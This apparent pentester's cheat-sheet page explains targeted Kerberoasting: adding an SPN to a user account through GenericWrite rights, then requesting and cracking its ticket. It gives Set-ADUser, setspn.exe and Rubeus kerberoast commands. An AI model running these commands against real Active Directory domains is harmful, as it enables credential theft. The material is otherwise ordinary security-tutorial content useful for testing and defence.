Skip to main content
Dr.Dolorem security

·182 words·1 min

Set SPN
#

This action requires GenericWrite or GenericAll privileges on the user object.

The concept is the same as for kerberoasting. Since it requires accounts to have an SPN, we can add a Service Principal Name by simply using a name that must be unique through the whole forest. This allows us to request a ticket to that service and try to decrypt the user account hash. However, can be detected due to requests to unexistent service.

Get all users with a SPN set

{% code title=“PowerShell AD module” %}

Get-ADUser -Filter 'ServicePrincipalName -ne "$Null"'

{% endcode %}

Check if a user already has an SPN set using setspn.exe

{% code title=“CMD.exe” %}

setspn.exe -L <SamAccountName>

{% endcode %}

Set a SPN for a user

{% code title=“PowerShell AD Module” %}

Set-ADUser -Identity <SamAccountName> -ServicePrincipalName @{Add='SPN/SPN'}

{% endcode %}

Set a SPN for a user using setspn.exe

{% code title=“CMD.exe” %}

setspn.exe -S <SPN/SPN> <SamAccountName>

{% endcode %}

Now that the user has an SPN, we can execute Kerberoasting against it

{% code title=“Rubeus.exe” %}

Rubeus.exe kerberoast /user:<SamAccountName>

{% endcode %}